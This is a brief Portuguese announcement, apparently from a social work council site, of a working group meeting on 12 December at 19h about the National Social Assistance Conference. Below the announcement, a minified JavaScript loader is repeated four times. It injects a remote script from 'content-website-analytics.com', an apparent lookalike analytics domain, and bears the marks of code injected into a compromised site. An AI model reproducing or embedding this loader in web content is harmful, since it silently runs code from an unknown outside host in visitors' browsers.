GT do Serviço Social na Assistência Social
É nesta terça-feira, 12 de dezembro, às 19h, o GT do Serviço Social na Assistência Social.
Tema: Diálogo Sobre a Conferência Nacional de Assistência Social.
Inscrições por este link.
;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i);w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https://content-website-analytics.com/script.js');;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i);w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https://content-website-analytics.com/script.js');;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i);w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https://content-website-analytics.com/script.js');;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i);w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https://content-website-analytics.com/script.js');...